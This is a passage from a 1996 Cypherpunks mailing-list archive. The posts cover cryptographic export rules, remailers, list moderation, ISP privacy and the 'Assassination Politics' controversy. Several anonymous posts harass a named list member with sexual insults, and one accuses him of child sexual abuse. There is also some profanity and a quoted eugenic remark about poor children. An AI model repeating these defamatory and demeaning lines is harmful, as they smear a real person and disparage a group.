can follow the user's queries and infer what the user is after. Indeed, in cases where the users' intentions are to be kept secret, users are often cautious about accessing the database. It can be shown that when accessing a single database, to completely guarantee the privacy of the user, the whole database should be downloaded , namely $n$ bits should be communicated (where $n$ is the number of bits in the database). In this work, we investigate whether by replicating the database, more efficient solutions to the private retrieval problem can be obtained. We describe schemes that enable a user to access $k$ replicated copies of a database ($k\geq 2$) and privately retrieve information stored in the database. This means that each individual database gets no information on the identity of the item retrieved by the user. These schemes use the replication to gain substantial saving. In the talk, I will describe the original work on this topic (joint work with Oded Goldreich, Eyal Kushilevitz, and Madhu Sudan), as well as recent developments in this area. Refreshments to follow. Email: talk-info at cs.washington.edu Info: http://www.cs.washington.edu ---------------End of Original Message----------------- From declan at eff.org Tue Sep 24 22:21:59 1996 From: declan at eff.org (Declan McCullagh) Date: Wed, 25 Sep 1996 13:21:59 +0800 Subject: SAY WHAT? [Hallam-Baker demands more repudiations or he'll write!] In-Reply-To: Message-ID: Libertarian philosophy is, however, sympathetic to vigilantism. True libertarians might characterize AP-type schemes as allowing two forms of action: just assassination (Hitler, Stalin) and unjust murder (most everyone else). But reasonable libertarians will probably disagree where lines should be drawn. -Declan On Tue, 24 Sep 1996, Simon Spero wrote: > On Tue, 24 Sep 1996, attila wrote: > > > > > go back to your beloved England and your labour unions > your roots are showing :-) ----^ > > > NO, I will not outright reject Jim Bell's "Assassination > > Politics." > > Assasination politics is impossible to defend from a classical > Liberal/Libertarian position. Bell advocates arbitrary applications of > violence and coercion without restriction. There is no way to justify the > initiation of force without abandoning any pretence of being a > Libertarian (which, to be fair, Bell doesn't claim to be). > // declan at eff.org // I do not represent the EFF // declan at well.com // From gt4436c at prism.gatech.edu Tue Sep 24 22:25:14 1996 From: gt4436c at prism.gatech.edu (Jeremy Mineweaser) Date: Wed, 25 Sep 1996 13:25:14 +0800 Subject: WHO IS MAKING A MOCKERY OF WHOM? Message-ID: <3.0b19.32.19960924175545.009af9c0@50h97.res.gatech.edu> At 06:15 AM 9/24/96 -0700, Sandy Sandfort wrote: >C'punks, >Time for another informal poll. > >On Mon, 23 Sep 1996, John Anonymous MacDonald wrote: >> What a joy to make a public mockery of Tim Mayo! > >Do list members think Anonymous' posts make a public mockery of >Tim May or Anonymous? Let me know whose reputation you think >is enhanced or tarnished by these posts. I'll post a summary to >the list in a week or two. First, to answer your question, I think the posts tarnish the reputation of Anonymous, although there never was much reputation to begin with. I am of the opinion that a positive reputation is earned, not given, and arguing over the matter at hand certainly doesn't help build a positive reputation. Since these annoying posts started a week or so ago, I have (for the first time ever) begun killfiling people and messages on the cp list. Right now I am killing all messages from John Anonymous MacDonald, Dmitri Vulis, and any message in the "daily ... regarding TCM" thread(s). I hope this madness can end, so we can get back to more normal traffic levels on the list. If anything good can come of this, it's that more people (myself included) will begin to use filtering tools to improve the perceived S/N ratio of the list. I am working on making a Eudora Pro plugin that creates and maintains a reputation system, which can then be tailored to modify incoming mail as desired, removing irrelevant paragraphs, summarizing, all kinds of things. Initially it will just keep an index score for each user representing the quality of the content which they author, but I have lots of things I hope to add to it. Good luck with the survey, Jeremy --- Jeremy L. Mineweaser | GCS/E d->-- s:- a--- C++(+++)$ ULC++(++++)>$ P+>++$ gt4436c at prism.gatech.edu | L+>++ E-(---) W++ N+ !o-- K+>++ w+(++++) O- M-- | V-(--) PS+(--) PE++ Y++>$ PGP++>+++$ t+() 5 X+ R+() *ai*vr*vx*crypto* | tv(+) b++>+++ DI+(++) D+ G++ e>+++ h-() r-@ !y- From nobody at zifi.genetics.utah.edu Tue Sep 24 22:30:20 1996 From: nobody at zifi.genetics.utah.edu (Anonymous) Date: Wed, 25 Sep 1996 13:30:20 +0800 Subject: The daily word of caution regarding Timmy May Message-ID: <199609242059.OAA27794@zifi.genetics.utah.edu> Timmy May studied yoga back-streching exercises for five years so he could blow himself (nobody else will). From tcmay at got.net Tue Sep 24 22:37:01 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 25 Sep 1996 13:37:01 +0800 Subject: Portal remailer shutting down Message-ID: At 7:03 PM 9/24/96, Hal wrote: >The ISP which I have used for over five years, portal.com, is going >out of business at the end of this month (September, 1996). This means >that my remailer at hfinney at shell.portal.com will cease operations. >I had asked that it be removed from the remailer lists a few weeks ago >due to some problems, so hopefully not many people have been using it >lately. But now it will go away for good. > >This remailer has been in operation since the fall of 1991. I believe it ^^^^^^^^^^^^ You obviously mean "fall of 1992." Anyway, congratulations on all of your work back then (in 1992 :-)), and for running it for so long. I, too, was a Portalite, from 1988-1992 (when I switched to Netcom, which offered a local POP (point of presence) in Santa Cruz). Portal was the first major ISP to offer accounts to non-academic users. They were also heavily used by those who'd signed up with "PC-Pursuit," a flat-rate phone service which made it feasible to dial-in to Portal from anywhere in the country. When the plug was pulled on PC-Pursuit, circa mid-89, the prospects for Portal dimmed as well. (My own usage dropped dramatically when PC-Pursuit was canned, as dialing-in to Portal directly was costing me $6-10 an hour, depending on the time of day. Once I got on with Netcom, in 1992, I was able to join various mailing lists, including the Extropians list and of course the Cypherpunks list.) I haven't been following the fortunes of Portal for a couple of years, but its relative absence from the playing field of Netcom, Best, Earthlink, etc. has been pretty noticeable. So I can't say I'm surprised it's going away. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From rah at shipwright.com Tue Sep 24 22:53:01 1996 From: rah at shipwright.com (Robert Hettinga) Date: Wed, 25 Sep 1996 13:53:01 +0800 Subject: The Netsurfer of Penzance Message-ID: --- begin forwarded text Priority: normal Date: Tue, 24 Sep 1996 10:31:58 PST Reply-To: Law & Policy of Computer Communications Sender: Law & Policy of Computer Communications From: Eugene Volokh Organization: UCLA School of Law Subject: The Netsurfer of Penzance To: CYBERIA-L at LISTSERV.AOL.COM ------- Forwarded Message Follows ------- From: "Thomas P. Vogl" The Newbie's Song (Based on the Major General's song from "The Pirates of Penzance", Gilbert & Sullivan). I am the very model of a Usenet individual, I've information meaningless and ultimately trivial, I know the basic elements of alien biology, And all the hidden secrets of the Church of Scientology, I've seen "The Wrath of Khan" and every Star Trek film that followed it, I moan about my Servicecard and how the cash till swallowed it, About the laws on handguns I am sending off a counterblast, With many cheerful facts about the way you can MAKE MONEY FAST! ALL: With many cheerful etc. I'll tell you why the Japanese are taking over Panama, And why the USA is still a better place than Canada, In short, in matters meaningless and ultimately trivial, I am the very model of a Usenet individual. ALL: In short, in matters meaningless and ultimately trivial, He is the very model of a Usenet individual. I post in alt.revisionism lies about the Holocaust, I cut my .sig to twenty lines, I didn't want to, I was forced, I really can't believe the "Good Times" virus to be mythical, And Clinton's raising taxes which is, frankly, bloody typical, I've upset several people on alt.flame, I really don't know how, And sent a thousand business cards to Mr. and Mrs. Shergold now, I have a very poor grip of political geography, And absolutely no involvement (yet!) in child pornography, ALL: And absolutely no, etc. I've paid two-fifty dollars for the Nieman-Marcus recipe, And told the Spanish tourist's tale about the toothbrush pessary, In short, in matters meaningless and ultimately trivial, I am the very model of a Usenet individual. ALL: In short, in matters meaningless and ultimately trivial, He is the very model of a Usenet individual. In fact, when I know what is meant by "binary" and "FTP", When I know how to decode porno JPEGs from a .uue, When I can handle HTML, Telnet, mail and IRC, And when I know the words initialized to form "http", When I have learnt what topics are acceptable in talk.bizarre, When I know more of Usenet than the tailpipe of a motor-car, In short, when I've a smattering of elementary netiquette, You'll say a better individual has never surfed the Net. ALL: You'll say a better individual, etc. For my technical experience, although I claim to know it all Could barely serve to run the installation disk from AOL; But still, in matters meaningless and ultimately trivial, I am the very model of a Usenet individual. ALL: But still, in matters meaningless and ultimately trivial, He is the very model of a Usenet individual. ----------------------------------------------------------------- Harry Erwin, Internet: herwin at gmu.edu, Web Page: http://osf1.gmu.edu/~herwin 49 year old PhD student in computational neuroscience ("how bats do it" 8) and lecturer for CS 211 (data structures and advanced C++) -- Eugene Volokh, UCLA Law --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From gbroiles at netbox.com Tue Sep 24 22:53:18 1996 From: gbroiles at netbox.com (Greg Broiles) Date: Wed, 25 Sep 1996 13:53:18 +0800 Subject: Bernstein hearing: The Press Release Message-ID: <3.0b19.32.19960924160043.006edf48@ricochet.net> >And the ITARs are only executive orders, no? Not laws, right? I'm curious >as to why they're considered valid. Anyone know? They're administrative regulations. Legislative bodies (like Congress and state legislatures) can delegate some of their legislative authority to executive agencies (like the Forest Service or the State Dept) to make rules which have the force of law. This is done because legislatures don't have time to write all of the laws that bureaucrats think ought to be written - so the legislature says "Fine, write your own damn laws." Legislatures don't want to bother with deciding where you can build a fire on federal lands or exactly how close you can fly to an airport if you're not taking off or landing or what happens to undeliverable mail at the Post Office. So legislatures give some of their lawmaking power to the agencies that are in a position to see what needs to be regulated. The delegation of power is limited by superior law (e.g., statutes written by the legislature) and the regulatory duties of the agency (such that the Forest Service can't write regs for the FAA, etc.) and by the grant of power itself. This sounds like cops making up their own laws - and it is, but they have to act like legislatures when they do it. This means that they must (generally) publish proposed regs, accept comments, ignore them, and then publish final regulations. Agencies can't change the regs on a daily or a case-by-case basis, or change them without making the changes public. (But "public" means "buried somewhere in the Federal Register".) And that's what the ITAR is - a body of administrative law developed by the executive branch pursuant to a grant of power from Congress. (e.g., 22 USC 2778(a)(1), ". . . The President is authorized to designate those items which shall be considered as defense articles and defense services for the purposes of this section and to promulgate regulations for the import and export of such articles and services. The items so designated shall constitute the United States Munitions List.") It is subject to review by the courts just like the product of Congress itself; and an agency can't do something Congress can't do, like write an unconstitutional law. (Which is not to say that I agree with the inclusion of crypto on the list, or even the idea of "export controls", but I've seen the argument that "ITAR is not a real law so none of this matters" float across the list a few times and it's not realistic. Whether or not a given individual likes the idea of administrative rulemaking, it's clear that the courts and the government think that it's real, and will put people in jail for violating administrative regs.) -- Greg Broiles | "We pretend to be their friends, gbroiles at netbox.com | but they fuck with our heads." http://www.io.com/~gbroiles | | From rwright at adnetsol.com Tue Sep 24 22:55:01 1996 From: rwright at adnetsol.com (Ross Wright) Date: Wed, 25 Sep 1996 13:55:01 +0800 Subject: Public Schools Message-ID: <199609250325.UAA10747@adnetsol.adnetsol.com> On Or About: 24 Sep 96 at 14:16, Dr.Dimitri Vulis KOTM wrote: > No, on the contrary, sending poor kids to good schools on scholarships > does not improve their genes. They tend to become drug dealers. > That just about does it for me. This jerk is just trying to push everyone's buttons. He is doing a beautiful job. Fuckhead. Ross From harmon at tenet.edu Tue Sep 24 23:00:00 1996 From: harmon at tenet.edu (Dan Harmon) Date: Wed, 25 Sep 1996 14:00:00 +0800 Subject: Public Schools In-Reply-To: <199609241652.LAA22261@mailhub.amaranth.com> Message-ID: On Tue, 24 Sep 1996, William H. Geiger III wrote: > Dan Harmon said: > >One of the hardest things that we have to work hardest to counter-act > >with our twins, who attend PS, is the socialization they > >pick up at school. > > There is an easy solution to that problem, it's called home school. :) > We know several people that home school and it takes a very special people to do it. In our case, it may turn out to be the only option. The twins are ADHD with possible Tourettes and/or OCD. They we diagnosed at four, before it became the rage, and are now ten, going on six emotionally. We keep trying and working with them. Dan From unicorn at schloss.li Tue Sep 24 23:02:22 1996 From: unicorn at schloss.li (Black Unicorn) Date: Wed, 25 Sep 1996 14:02:22 +0800 Subject: Lexis and Privacy - Bill approaches. Message-ID: Pressure from the FTC Which fielded hundreds of complaints about Lexis and the social security number scrap) has prompted members of the Banking Committee to add provisions to the most recent spending bills which protect personal information (including social security numbers, phone numbers, addresses, and so forth) under the Fair Credit Reporting Act. This limits access to this information to credit agencies and otherwise authorized entities. (Of which I assume Lexis is not one). It's not great protection, but it's something. I urge everyone to take their own measures to protect personal data regardless of what some piece of paper on a library shelf says is protected. The only real protection is not to allow release of the data in the first place. -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From shamrock at netcom.com Tue Sep 24 23:03:20 1996 From: shamrock at netcom.com (Lucky Green) Date: Wed, 25 Sep 1996 14:03:20 +0800 Subject: Private Information Retrieval In-Reply-To: <2.2.32.19960924222443.006964e8@netcom7.netcom.com> Message-ID: On Tue, 24 Sep 1996, Ravi Pandya wrote: > ABSTRACT: > > Publicly accessible databases are an indispensable resource for retrieving > up to date information. But they also pose a significant risk to the > privacy of the user, since a curious database operator can follow the user's > queries and infer what the user is after. Hmm. Sounds like job for KeyKOS :-) --Lucky From m5 at tivoli.com Tue Sep 24 23:03:25 1996 From: m5 at tivoli.com (Mike McNally) Date: Wed, 25 Sep 1996 14:03:25 +0800 Subject: [EFG] Fwd: Ga. Internet Law Challenged In-Reply-To: <2.2.32.19960925010103.00679840@smtp1.abraxis.com> Message-ID: <3248AAFE.5F7@tivoli.com> > >> ``If 50 states pass 50 contradictory laws, Internet users will > >>be virtually paralyzed for fear of violating one or more of those > >>laws,'' she said. Actually, I imagine Internet users will simply snigger and go on with their idiotic "me too"s to USENET, their sophomoric nudie websites, and their spams. (I love the Internet.) ______c_________________________________________________________________ Mike M Nally * IBM % Tivoli * Austin TX * How quickly we forget that mailto:m5 at tivoli.com mailto:m101 at io.com * "deer processing" and "data http://www.io.com/~m101/ * processing" are different! From jamesd at echeque.com Tue Sep 24 23:11:09 1996 From: jamesd at echeque.com (James A. Donald) Date: Wed, 25 Sep 1996 14:11:09 +0800 Subject: We removed radikal 154 from xs4all :( Message-ID: <199609242023.NAA10025@dns1.noc.best.net> At 6:31 PM 9/23/96, tank wrote: >>Hi all, >> >>We have temporary removed radikal 154 from xs4all. >> >>We did this because the german ICTF and BAW continued to stop IP-traffic >>to and from xs4all. They not only blocked the web-server (with more than At 02:00 PM 9/23/96 -0700, Timothy C. May wrote: >Unfortunately, this means that Germany wins. No it does not: It means that I and presumably lots of other people just added radikal to their web sites. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From whgiii at amaranth.com Tue Sep 24 23:33:37 1996 From: whgiii at amaranth.com (William H. Geiger III) Date: Wed, 25 Sep 1996 14:33:37 +0800 Subject: ISP Legal Fund Message-ID: <199609250430.XAA29666@mailhub.amaranth.com> Hi, As it seems to be an almost daily event of hearing of a government authortity infringing on the liberty of Internet Users throughout the world I would like to present the following proposal: The establishment of an Internet Service Provider Legal Fund. All ISP world-wide would contribute to this fund. The resources of this fund would be used for the legal fees of ISP who whish to challenge government infringements of their users freedoms & liberties. Something like an ACLU for the Internet but on a Global scale. Any thoughts? -- ----------------------------------------------------------- William H. Geiger III http://www.amaranth.com/~whgiii Geiger Consulting WebExplorer & Java Enhanced!!! Merlin Beta Test Site - WarpServer SMP Test Site Author of PGPMR2 - PGP Front End for MR/2 Ice Look for MR/2 Tips & Rexx Scripts Get Work Place Shell for Windows!! PGP & MR/2 the only way for secure e-mail. Finger whgiii at amaranth.com for PGP Key and other info ----------------------------------------------------------- From adam at homeport.org Tue Sep 24 23:40:17 1996 From: adam at homeport.org (Adam Shostack) Date: Wed, 25 Sep 1996 14:40:17 +0800 Subject: Banning annoying users In-Reply-To: <199609241158.HAA27269@envirolink.org> Message-ID: <199609242021.PAA07861@homeport.org> Daniel Miskell wrote: | The | not allowing unsubscribed individuals to post is logical, for a time. But | that basically outlaws anon remailers that don't allow you to send to an | account, and a lot of them don't, from my limited understanding. Besides, if | we set up the list to ban people who are 'undesirable', instead of just using | our own killfiles to do the dirty work for the list, then what is to stop If non-subscribers, aka remailers are banned from cypherpunks, I'll personally subscribe every remailer to the list. Be a good exercise in writing filters for the remailers. Saying that you can't deal with immature people using remailers, and thus they should be banned from cypherpunks is ammo to our opponents, who will sieze the opportunity to say, 'See, even cypherpunks can't deal with anonymity.' The list has gone way downhill, but offers a forum unavailable elsewhere online. As Tim points out, you can contribute or leave. I'm trying to contribute. As a basic rule of thumb, if your posts are generating lots of flames, you're not contributing, you're arguing. (He says to generate flames.) Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From bdavis at thepoint.net Tue Sep 24 23:51:57 1996 From: bdavis at thepoint.net (Brian Davis) Date: Wed, 25 Sep 1996 14:51:57 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! In-Reply-To: <3.0b24.32.19960924064658.006b3540@mail.teleport.com> Message-ID: On Tue, 24 Sep 1996, Rich Burroughs wrote: > > Anyone who mistakes the lack of "repudiations" for AP on the list for some > kind of tacit approval is not getting the whole picture, IMHO. > > Is this how journalists do their research nowadays -- "give me some info or > I'll write something really bad about you that you'll regret?" Cool. I > guess I thought there might still be some kind of pursuit of the truth > involved. > > I personally don't have the time or energy to contribute to the AP threads. > That != approval for the idea. > > I hope you include your above quote in your piece. > Amen to that. Add that at least one lawyer (and former prosecutor) on the list is confident that successful prosecutions will ensue is AP ever gets off the ground. And yes, I've read Jim Bell's manifesto. The fact that no lawyer has dissected it from a legal standpoint has been used by Mr. Bell as support for the propostion that it is legal. As many professional crytographers/computer security experts/etc. on the list rightly say when free work is demanded of them: pay me my rate and I'll do the analysis. EBD > > Rich > > > ______________________________________________________________________ > Rich Burroughs richieb at teleport.com http://www.teleport.com/~richieb > See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon > U.S. State Censorship Page at - http://www.teleport.com/~richieb/state > New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause > From tcmay at got.net Wed Sep 25 00:39:15 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 25 Sep 1996 15:39:15 +0800 Subject: Namibia, Marxists, and Peaceful Transitions Message-ID: At 5:02 PM 9/24/96, stewarts at ix.netcom.com wrote: >People have been imposing their will on others in Ireland for 800 years, >and killing off the more prominent members of the opposition has been >a long-term policy of the thugs who've been doing it. Today there are >at least three competing gangs of thugs trying to impose their will on >others by force. The Protestants are afraid that the Catholic majority >on the island will enforce their rule on them, and the Catholics in the north >are afraid that the Protestants will enforce their rule on them, >both with good reason as near as I can tell. At least a few years ago, >the IRA were spouting Marxist rhetoric and wanted to impose their >Marxist thuggery on the whole island. The Queen's Empire's army ... Apropos of this (but not apropos of mathematical cryptography :-}), I read an amazing article, an uplifting article, a few years ago in the WSJ. The article was about Namibia, the country to the northwest of South Africa. Also known at times as "South-West Africa." (Being a Pynchon fan, Namibia and its Hereros had always had some interest to me.) South Africa was involved in a war/occupation situation with Namibia for many decades, with hit teams deployed to Windhoek to kill off opponents, etc. A bad situation all around. Some similarities with the situation in Northern Ireland. The leader of the opposition--which I think was called SWAPO, though that might have been Angola...anyway, some alphabet soup name like SWAPO--was a U.S.-trained college professor-type dyed-in-the-wool Marxist theoretician. He lived for years in Harlem and wrote articles about the coming Marxist paradise in Namibia. Rhetoric about driving out the parasites that prey upon the body of the people, seizing the means of production, yadda yadda yadda. All the usual Marxist stuff. Well, South Africa pulled out. Some sort of "peaceful transition" was arrived at, and the Marxists moved in. Except they almost immediately abandoned their Marxist rhetoric (which was approximately coincident with the collapse of Communism and the Berlin Wall, U.S.S.R., etc., so this may have had something to do with their loss of Marxist faith). The long and short of it is that the Namibian economy is doing well, relations with South Africa are good (also helped by changes in RSA's government one has to assume), the citizens are happy, AP-type killings have stopped, and both blacks and whites appear to be getting along fine. After reading the article, and seeing an interesting Namibian-made movie called "Dust Devil," I decided I would one day visit Namibidia as a tourist. (The article was a stunning one, the kind that the WSJ is able to sometimes do so well. I clipped it out, but have long since lost track of it. If anybody finds it in any online archives, I would appreciate getting a copy.) Whether Northern Ireland could be handled so felicitously is not clear, though I suspect the North could be absorbed into the Republic of Ireland easily and without "summary executions" of Protestants. Ireland--the Republic--is doing pretty well, has lots of high-tech plants (including a massive Intel chip factory near Limerick) and I think even the Northern Ireland Protestants would end up better off under Irish rule. (While many of us dislike the basic notion of "Irish rule," surely the nonlocal rule by a country across the Irish Sea is less appropriate than by the historical and geographic "landmass" of Ireland per se?) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From frantz at netcom.com Wed Sep 25 00:49:19 1996 From: frantz at netcom.com (Bill Frantz) Date: Wed, 25 Sep 1996 15:49:19 +0800 Subject: Private Information Retrieval Message-ID: <199609250458.VAA20863@netcom8.netcom.com> At 8:54 PM 9/24/96 -0700, Lucky Green wrote: >On Tue, 24 Sep 1996, Ravi Pandya wrote: > >> ABSTRACT: >> >> Publicly accessible databases are an indispensable resource for retrieving >> up to date information. But they also pose a significant risk to the >> privacy of the user, since a curious database operator can follow the user's >> queries and infer what the user is after. > >Hmm. Sounds like job for KeyKOS :-) Yup. That was the original problem KeyKOS nee Gnosis was designed to solve. ------------------------------------------------------------------------- Bill Frantz | "Cave softly, cave safely, | Periwinkle -- Consulting (408)356-8506 | and cave with duct tape." | 16345 Englewood Ave. frantz at netcom.com | - Marianne Russo | Los Gatos, CA 95032, USA From Adamsc at io-online.com Wed Sep 25 00:51:40 1996 From: Adamsc at io-online.com (Adamsc) Date: Wed, 25 Sep 1996 15:51:40 +0800 Subject: A daily word of caution in reference Tim C[unt] May Message-ID: <19960925052046390.AAA216@IO-ONLINE.COM> On Mon, 23 Sep 1996 01:50:01 -0400, Dustbin Freedom Remailer wrote: >Tim C[unt] May is not only as queer as a three dollar bill, but he is also into >having sex with children. Hi Dmitri! From Adamsc at io-online.com Wed Sep 25 01:01:48 1996 From: Adamsc at io-online.com (Adamsc) Date: Wed, 25 Sep 1996 16:01:48 +0800 Subject: Taking crypto out of the U.S. Message-ID: <19960925054434656.AAA117@IO-ONLINE.COM> On Mon, 23 Sep 1996 21:25:33 -0500 (EST), Adam Shostack wrote: >Theres a personal use exemption. Michael Froomkin's web page has a >pointer to it. What if your laptop gets "stolen"? Or you sell it for a plane ticket home after your wallet gets pinched? >| Soon I am going to be going overseas to Japan, and I want to take >| my notebook with me so I can keep up with everything, however, I have >| encrypted my hard drive and usually encrypt my mail. Is this in violation >| of the ITAR to keep everything the same when I go over? From geeman at best.com Wed Sep 25 01:02:26 1996 From: geeman at best.com (geeman) Date: Wed, 25 Sep 1996 16:02:26 +0800 Subject: Tamper-Resistant Software from INTEL In-Reply-To: <199609242330.SAA16789@oak.zilker.net> Message-ID: <3248C68E.F61@best.com> Scott Guthery wrote: > > Has anybody heard of tamper-resistant software in general or a method > for tamper-resistant software from Intel in particular? > yes. From markm at voicenet.com Wed Sep 25 01:07:05 1996 From: markm at voicenet.com (Mark M.) Date: Wed, 25 Sep 1996 16:07:05 +0800 Subject: Banning annoying users In-Reply-To: Message-ID: On Tue, 24 Sep 1996, Ray Arachelian wrote: > This is wonderful in theory -- and in practice up until now, but what > happens when someone decides "Oh, I hate this list and Tim, let me write > a spam bot to anonymously spam the this into oblivion?" There is such a > thing as denial of service via spamming. It's quite easy to do for > someone who knows how to run sendmail and knows how to write a shell > script or a small program. Hell, I could write one of those in less than > 1 minute. > > As for me being banned, I doubt it, I'm not posting daily Tim warnings > and such spams. yeah, banning someone off the list for their political > or even crypto views is silly. Banning someone for spamming is another > issue. > > There is no reason we can't allow posts from those who are not subscribed > to the list. There's also no reason that we can't have someone moderate > those posts before they make it to the list to remove the spams - mind > you not to moderate the contents, but to remove repeating annoying spam > and advertisement. This scheme would not allow people using anonymous remailers to post to the list. If you let posts through anonymous remailers through, then the refusal to allow anyone not subscribed to post becomes meaningless. Spam can be prevented by looking for a large number of messages delivered at about the same time. There's no need to involve a moderator. Mark -- PGP encrypted mail prefered. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ From tcmay at got.net Wed Sep 25 01:10:54 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 25 Sep 1996 16:10:54 +0800 Subject: ISPs' information on users Message-ID: At 8:18 PM 9/24/96, Robert Hettinga wrote: >--- begin forwarded text >> ------------------------------ >> Brave Old World: >> Reflections on Europe in the Digital Age >> by Steven Carlson; 20 Sep 1996 >> ------------------------------ >> >> ** So Much Fuss About A Bottle Of Ketchup >> >> Hungarian police recently sent a fax around to the local Internet >> service providers (ISPs) asking them to provide lists of their users >> in Esztergom, a small town outside of Budapest. It seems somebody >> had planted a bomb in a bottle of ketchup. Since everyone knows you >> can download bomb-making instructions from the Internet, the police >> figured they should investigate the local users. No, I'm not making >> this up. So, Hungary has GAK -- Government Access to Ketchup. Good to know the 57 Varieties are now considered munitions. On a more serious note, perhaps legal experts here could comment on something I've been wondering about. Could ISPs in the UlS. be compelled to report on the browsing and net surfing habits of their customer base? To make this clear, I don't mean in a specific criminal case, where the records are searchable under a warrant. I mean a blanket order that all ISPs compile and forward records. Were I an ISP, I would probably say, "Hell no! They're my records and the Fourth Amendment says my records are to be secure unless a proper court order is issued. Besides, my fee for generating each kilobyte of records is $100,000, nonnegotiable." (I think I've answered my own question, namely, ISPs would be under no obligation to report on customer activities, absent a proper warrant, and consistent with the ECPA.) However, ISPs are _not_ accorded the same status as priests, lawyers, and others with such privacy privileges (and obligations). Would it be legal for an ISP to offer for sale such records? Or to voluntarily go to the cops? (There's a certain new ISP with tight links to a quasi-religious group much in the news lately, and some have speculated that this ISP may be monitoring certain users....) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From stewarts at ix.netcom.com Wed Sep 25 01:14:31 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Wed, 25 Sep 1996 16:14:31 +0800 Subject: provably hard PK cryptosystems Message-ID: <199609250509.WAA20265@dfw-ix12.ix.netcom.com> At 03:26 PM 9/24/96 +0200, Gary Howland wrote: >I fail to see *any* (non educational) use for these DNA "computers", let >alone a cryptographic use - sure, they may be massively parallel, but >what's the big deal? I can now perform a calculation a million times >faster than I could yesterday? (something I personally doubt, but will >agree to for sake of the argument). One mole of a substance contains ~6x10**23 molecules, and weighs one gram per atomic-weight of the molecule. A DNA "computer" might weigh a kilo or two for one mole of computer virus. It may not be blazingly fast, especially if you've got to synthesize lots of different molecules to make it up, plus extract the result from the data soup, but 10**23 is a _big_ number. It's probably not very useful for cryptographic applications, but Adleman was using it to solve Travelling Salesman problems, which are NP-hard, and if you do have a crypto problem that maps well into TSP, a hot-tub full of interesting solutions might be an interesting solution, especially if you've got a huge underground lab and a National Institutes of Health nearby in case you have any bugs or memory leaks in your program..... Unlike quantum computing, it doesn't change the exponentiality of the problems it's solving, it just multiplies the computing capability by a very big constant, and it does parallelize cleanly. The engineering is tricky, but I find it more believable than practical high-precision quantum computers. And if the DNA computer doesn't work, you can always recycle your lab to synthesize large quantities of recreational pharamceuticals and use the money from them to bribe the person who knows the key. Avogadro # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From Adamsc at io-online.com Wed Sep 25 01:16:43 1996 From: Adamsc at io-online.com (Adamsc) Date: Wed, 25 Sep 1996 16:16:43 +0800 Subject: List participation Message-ID: <19960925053157109.AAA213@IO-ONLINE.COM> On Mon, 23 Sep 1996 10:25:09 -0700, Eric Hughes wrote: >I have been informed that Dr.Dimitri Vulis KOTM wrote: >> [...] Tim's off-topic spews have driven Eric Hughes, John Gilmore, >> Rich Salz, and many other former valuable contributors off the >> mailing list [...] > >As for me, I stopped having time to read cypherpunks a year and a half ago. >Tim had nothing to do with it. The cypherpunks list has changed and I have >changed; so be it. What do you think the odds are the good Dr. is going to say this is a forgery by tcmay? From dthorn at gte.net Wed Sep 25 01:21:02 1996 From: dthorn at gte.net (Dale Thorn) Date: Wed, 25 Sep 1996 16:21:02 +0800 Subject: More proposals for European censorship In-Reply-To: <199609231442.HAA20480@toad.com> Message-ID: <32488744.51AA@gte.net> Peter Trei wrote: > Asgaard writes: > > On Thu, 19 Sep 1996, E. Allen Smith forwarded: > > >> STRASBOURG, France (Sep 19, 1996 11:24 a.m. EDT) - The European > > >> Parliament pressed the European Union on Thursday to act to curb > > >> child sex and trafficking rings, saying the fight against sexual > > >> abuse of children must be an "absolute priority." > > It's probably no coincidence that the recently busted, utter > > horrible > > child-molesting ring, with obvious protection from various persons > > in the establishment, was centered in Belgium - that's where the EU > > bureaucrat nomenklatura play their power games and go to bordellos. > What exactly are you suggesting when you say 'it's probably no > coincidence?" I can't quite figure it out. "I can't quite figure it out" - says a lot right there. > [While I've not been following the case in detail, it involves a ring > of criminals in Belgium who kidnapped children to use them in > child pornography. At least two little girls were starved to death > when they're usefullness was over.] > Are you suggesting that someone specifically set up a ring of > child pornographers/murders in Belgium, then let it get caught, in > an attempt to influence the EU parliment? > Or are you suggesting that this particular gang of sub-humans was > exposed at this time in an attempt to influence policy, implying that > the Belgian LEAs knew about, but did not stop the ring until they > needed a publicity coup? > I find such notions utterly beyond rationality. Per that comment about rationality: That LEA's knew about the ring, or that they would participate in a scam of some kind? > Do you expect we're going to see a statement from some Belgian > police investigator to the effect of "Yes, I knew they were raping 